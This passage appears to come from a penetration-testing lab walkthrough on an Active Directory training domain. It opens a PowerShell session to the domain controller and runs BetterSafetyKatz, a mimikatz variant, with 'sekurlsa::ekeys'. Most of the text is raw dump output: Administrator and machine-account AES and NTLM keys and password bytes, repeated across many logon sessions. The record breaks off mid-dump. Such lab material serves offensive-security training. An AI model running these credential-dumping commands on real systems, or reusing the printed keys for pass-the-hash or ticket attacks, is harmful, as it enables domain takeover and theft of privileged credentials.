Let’s Login to the DC and dump the Secrets
Enter-PSSession -ComputerName dcorp-dc
Now let’s use BetterSafetyKatz to Dump the Secrets
.\\BetterSafetyKatz.exe '"sekurlsa::ekeys"' "exit"
The Secrets
[dcorp-dc]: PS C:\\Users\\svcadmin\\Documents> .\\BetterSafetyKatz.exe '"sekurlsa::ekeys"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 19597879 (00000000:012b0a37)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:44:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19553514 (00000000:012a5cea)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:41:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19541297 (00000000:012a2d31)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:40:52 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19534775 (00000000:012a13b7)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:40:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19453118 (00000000:0128d4be)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:39:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19317683 (00000000:0126c3b3)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:31:34 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19310527 (00000000:0126a7bf)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:31:33 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19049052 (00000000:0122aa5c)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:24:21 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 17495648 (00000000:010af660)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/4/2024 9:01:47 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 17466297 (00000000:010a83b9)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/4/2024 9:01:42 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 16105052 (00000000:00f5be5c)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 6/27/2024 12:11:01 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 7148353 (00000000:006d1341)
Session : Interactive from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 5/3/2024 6:36:23 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 339042 (00000000:00052c62)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2/20/2024 11:39:50 PM
SID : S-1-5-90-0-2
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : ba 19 93 67 9c ed aa d0 71 40 07 2b 1c e9 9d 87 56 92 a9 89 74 d4 fb b2 d8 ba 13 ff dd 42 ca 16 21 f0 21 94 bb f4 bd 74 14 2e ff 76 c6 8a 96 7a 2c c9 48 13 a4 a1 80 d6 f5 e2 aa 96 b6 87 57 8d 81 bd f4 21 a1 e7 51 e2 65 50 fd 72 c5 40 2f e8 c1 1e 99 55 23 84 97 83 66 40 8b a7 a5 0d a5 92 e0 13 a2 b1 ed a7 67 1d 2d 88 26 23 48 fa 8b 87 2b 87 80 ba 3a 50 00 93 b1 48 f8 1e 6c 5b 74 33 b6 28 59 02 c3 10 4f e1 88 d3 c4 a6 c6 11 60 4c 49 f5 a8 d2 c1 f8 c6 38 7b a5 28 f6 55 22 d1 7e 01 51 87 19 b8 1a 98 23 8a c4 47 4f f7 87 a9 b2 e9 9e b7 f5 96 8f 57 27 90 1d 5e 14 3b 70 cb a2 78 c3 20 54 39 8f 53 0e 31 5a e9 a6 5f 9c 30 75 af 61 82 b4 73 3e 57 d5 2e f8 f7 12 70 b4 40 45 dc 9b a4 99 9b 76 c5 89 8b a7 1a bf 0b ab 02 7c
* Key List :
aes256_hmac 8cab277d4f79f03e68fc8589851a4758fe7d1cef9f3c6e801c99b477078fb91b
aes128_hmac 0f4cb6ab8323ed7b6bf7ea1d52c78a6c
rc4_hmac_nt 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old 681c98d8e718d09f2fa74105db9a6729
rc4_md4 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_nt_exp 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old_exp 681c98d8e718d09f2fa74105db9a6729
Authentication Id : 0 ; 339014 (00000000:00052c46)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2/20/2024 11:39:50 PM
SID : S-1-5-90-0-2
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : 8f cd 1d 76 f4 c9 30 82 27 ec a0 7e 35 af a6 ad f0 45 c8 a7 fc ac 00 84 7a 18 12 92 1a 61 2c df 2d d4 e2 fa 59 a4 10 a1 de a0 82 94 f0 bf c6 89 56 0e b5 ab b1 01 46 93 50 19 91 b6 62 19 8f 54 4e b7 33 81 78 cc bc 84 a1 8b 66 bc c6 5f 9a 8a ea 9a 3d ea e4 75 af a7 86 7d 8c 36 b6 ca 9c 7f 46 46 89 4a 91 a6 28 63 03 dc 00 7b 1b 4f 00 29 f7 85 20 81 b7 13 2d 99 45 5d 59 48 6d 99 a7 02 34 a4 52 bb b2 8b 83 6b 0d 7d 05 c0 10 91 61 99 c0 09 3c 72 27 a2 f9 cb c5 e7 48 56 da a4 ee 7a 4a 34 c8 e7 2d a5 74 97 63 59 ab 10 49 af fb d7 f1 40 fa 86 b2 82 18 60 02 35 a4 93 2f a3 f5 46 f5 d4 a9 a1 16 d8 48 a9 4c 7f 9b 70 80 e2 69 c2 4c 34 c5 86 02 c5 42 51 b5 65 43 71 31 04 2e d3 90 15 1f 55 ee 1a 7a 1b 84 d2 aa 85 9e 19 3c 8b
* Key List :
aes256_hmac b6c36a42af31a2b6dc52c974a55cc85fdc044d4c9cccf69dfd60d265b4f3befd
aes128_hmac 889ddb22ef9b50ee84b2e4950eb14549
rc4_hmac_nt e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old e355a154a94da7c6b292dd60a207a7c5
rc4_md4 e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_nt_exp e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old_exp e355a154a94da7c6b292dd60a207a7c5
Authentication Id : 0 ; 42366 (00000000:0000a57e)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2/20/2024 11:35:56 PM
SID : S-1-5-90-0-1
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : 8f cd 1d 76 f4 c9 30 82 27 ec a0 7e 35 af a6 ad f0 45 c8 a7 fc ac 00 84 7a 18 12 92 1a 61 2c df 2d d4 e2 fa 59 a4 10 a1 de a0 82 94 f0 bf c6 89 56 0e b5 ab b1 01 46 93 50 19 91 b6 62 19 8f 54 4e b7 33 81 78 cc bc 84 a1 8b 66 bc c6 5f 9a 8a ea 9a 3d ea e4 75 af a7 86 7d 8c 36 b6 ca 9c 7f 46 46 89 4a 91 a6 28 63 03 dc 00 7b 1b 4f 00 29 f7 85 20 81 b7 13 2d 99 45 5d 59 48 6d 99 a7 02 34 a4 52 bb b2 8b 83 6b 0d 7d 05 c0 10 91 61 99 c0 09 3c 72 27 a2 f9 cb c5 e7 48 56 da a4 ee 7a 4a 34 c8 e7 2d a5 74 97 63 59 ab 10 49 af fb d7 f1 40 fa 86 b2 82 18 60 02 35 a4 93 2f a3 f5 46 f5 d4 a9 a1 16 d8 48 a9 4c 7f 9b 70 80 e2 69 c2 4c 34 c5 86 02 c5 42 51 b5 65 43 71 31 04 2e d3 90 15 1f 55 ee 1a 7a 1b 84 d2 aa 85 9e 19 3c 8b
* Key List :
aes256_hmac b6c36a42af31a2b6dc52c974a55cc85fdc044d4c9cccf69dfd60d265b4f3befd
aes128_hmac 889ddb22ef9b50ee84b2e4950eb14549
rc4_hmac_nt e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old e355a154a94da7c6b292dd60a207a7c5
rc4_md4 e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_nt_exp e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old_exp e355a154a94da7c6b292dd60a207a7c5
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-DC$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:56 PM
SID : S-1-5-20
* Username : dcorp-dc$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b3cece7040400b2581d36c0719c3e3ba4403b97d7e07c315f01f55fb7f8d05ff
rc4_hmac_nt e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old e355a154a94da7c6b292dd60a207a7c5
rc4_md4 e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_nt_exp e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old_exp e355a154a94da7c6b292dd60a207a7c5
Authentication Id : 0 ; 25356 (00000000:0000630c)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:56 PM
SID : S-1-5-96-0-0
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : 8f cd 1d 76 f4 c9 30 82 27 ec a0 7e 35 af a6 ad f0 45 c8 a7 fc ac 00 84 7a 18 12 92 1a 61 2c df 2d d4 e2 fa 59 a4 10 a1 de a0 82 94 f0 bf c6 89 56 0e b5 ab b1 01 46 93 50 19 91 b6 62 19 8f 54 4e b7 33 81 78 cc bc 84 a1 8b 66 bc c6 5f 9a 8a ea 9a 3d ea e4 75 af a7 86 7d 8c 36 b6 ca 9c 7f 46 46 89 4a 91 a6 28 63 03 dc 00 7b 1b 4f 00 29 f7 85 20 81 b7 13 2d 99 45 5d 59 48 6d 99 a7 02 34 a4 52 bb b2 8b 83 6b 0d 7d 05 c0 10 91 61 99 c0 09 3c 72 27 a2 f9 cb c5 e7 48 56 da a4 ee 7a 4a 34 c8 e7 2d a5 74 97 63 59 ab 10 49 af fb d7 f1 40 fa 86 b2 82 18 60 02 35 a4 93 2f a3 f5 46 f5 d4 a9 a1 16 d8 48 a9 4c 7f 9b 70 80 e2 69 c2 4c 34 c5 86 02 c5 42 51 b5 65 43 71 31 04 2e d3 90 15 1f 55 ee 1a 7a 1b 84 d2 aa 85 9e 19 3c 8b
* Key List :
aes256_hmac b6c36a42af31a2b6dc52c974a55cc85fdc044d4c9cccf69dfd60d265b4f3befd
aes128_hmac 889ddb22ef9b50ee84b2e4950eb14549
rc4_hmac_nt e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old e355a154a94da7c6b292dd60a207a7c5
rc4_md4 e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_nt_exp e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old_exp e355a154a94da7c6b292dd60a207a7c5
Authentication Id : 0 ; 25350 (00000000:00006306)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:56 PM
SID : S-1-5-96-0-1
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : 8f cd 1d 76 f4 c9 30 82 27 ec a0 7e 35 af a6 ad f0 45 c8 a7 fc ac 00 84 7a 18 12 92 1a 61 2c df 2d d4 e2 fa 59 a4 10 a1 de a0 82 94 f0 bf c6 89 56 0e b5 ab b1 01 46 93 50 19 91 b6 62 19 8f 54 4e b7 33 81 78 cc bc 84 a1 8b 66 bc c6 5f 9a 8a ea 9a 3d ea e4 75 af a7 86 7d 8c 36 b6 ca 9c 7f 46 46 89 4a 91 a6 28 63 03 dc 00 7b 1b 4f 00 29 f7 85 20 81 b7 13 2d 99 45 5d 59 48 6d 99 a7 02 34 a4 52 bb b2 8b 83 6b 0d 7d 05 c0 10 91 61 99 c0 09 3c 72 27 a2 f9 cb c5 e7 48 56 da a4 ee 7a 4a 34 c8 e7 2d a5 74 97 63 59 ab 10 49 af fb d7 f1 40 fa 86 b2 82 18 60 02 35 a4 93 2f a3 f5 46 f5 d4 a9 a1 16 d8 48 a9 4c 7f 9b 70 80 e2 69 c2 4c 34 c5 86 02 c5 42 51 b5 65 43 71 31 04 2e d3 90 15 1f 55 ee 1a 7a 1b 84 d2 aa 85 9e 19 3c 8b
* Key List :
aes256_hmac b6c36a42af31a2b6dc52c974a55cc85fdc044d4c9cccf69dfd60d265b4f3befd
aes128_hmac 889ddb22ef9b50ee84b2e4950eb14549
rc4_hmac_nt e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old e355a154a94da7c6b292dd60a207a7c5
rc4_md4 e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_nt_exp e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old_exp e355a154a94da7c6b292dd60a207a7c5
Authentication Id : 0 ; 19668806 (00000000:012c1f46)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:48:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19656916 (00000000:012bf0d4)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:47:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19641731 (00000000:012bb583)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:46:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19628303 (00000000:012b810f)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:45:52 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19621687 (00000000:012b6737)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:45:50 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19615077 (00000000:012b4d65)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:45:49 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19609252 (00000000:012b36a4)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:45:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19583284 (00000000:012ad134)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:43:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19566235 (00000000:012a8e9b)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:42:40 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19326866 (00000000:0126e792)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:31:37 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 19298921 (00000000:01267a69)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:31:08 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 18312370 (00000000:01176cb2)
Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/12/2024 5:18:46 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 17433793 (00000000:010a04c1)
Session : Interactive from 0
User Name : administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/4/2024 9:01:37 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
